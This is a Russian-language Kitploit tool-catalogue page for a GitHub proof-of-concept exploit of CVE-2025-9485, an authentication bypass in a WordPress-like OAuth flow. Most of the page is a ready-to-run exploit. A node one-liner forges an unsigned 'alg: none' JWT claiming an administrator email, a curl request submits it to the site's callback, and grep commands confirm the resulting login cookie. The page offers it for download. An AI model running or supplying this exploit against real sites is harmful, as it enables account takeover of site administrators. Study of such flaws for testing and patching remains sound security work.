Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-9485 — Эксплойт-доказательство концепции для CVE-2025-9485, демонстрирующий обход аутентификации через неподписанный JWT (alg: none) в OAuth-потоке, похожем на WordPress. Включает скрипты подделки токена и запуска обратного вызова. | Kitploit
Инструменты/GitHubGitHub/jfriedli/cve-2025-9485
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификация
GitHubjfriedli/cve-2025-9485

CVE-2025-9485

Эксплойт-доказательство концепции для CVE-2025-9485, демонстрирующий обход аутентификации через неподписанный JWT (alg: none) в OAuth-потоке, похожем на WordPress. Включает скрипты подделки токена и запуска обратного вызова.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Exploit: Обход аутентификации через неподписанный JWT (alg: none)

1) Создание неподписанного JWT с утверждением email администратора

root@kitploit:~
TOKEN=$(node -e '
function b64u(s){
  return Buffer.from(s).toString("base64")
    .replace(/\+/g,"-")
    .replace(/\//g,"_")
    .replace(/=+$/,"")
}

const header = b64u(JSON.stringify({ alg: "none", typ: "JWT" }));

const now = Math.floor(Date.now()/1000);
const payload = b64u(JSON.stringify({
  iss: "https://evil.example",
  aud: "abc",
  sub: "admin-hijack",
  email: process.env.ADMIN_EMAIL,
  email_verified: "1",
  iat: now,
  exp: now + 3600
}));

console.log(header + "." + payload + ".");
')

echo "$TOKEN"

2) Запуск callback-аутентификации с поддельным id_token

root@kitploit:~
curl -i -A "Mozilla/5.0" \
  "$SITE/?code=DUMMY&id_token=$TOKEN&state=$STATE" \
  | tee /tmp/poc_headers.txt

3) Проверка успешной аутентификации

root@kitploit:~
grep -i '^set-cookie: wordpress_logged_in' /tmp/poc_headers.txt
grep -i '^location:' /tmp/poc_headers.txt
Скачать инструмент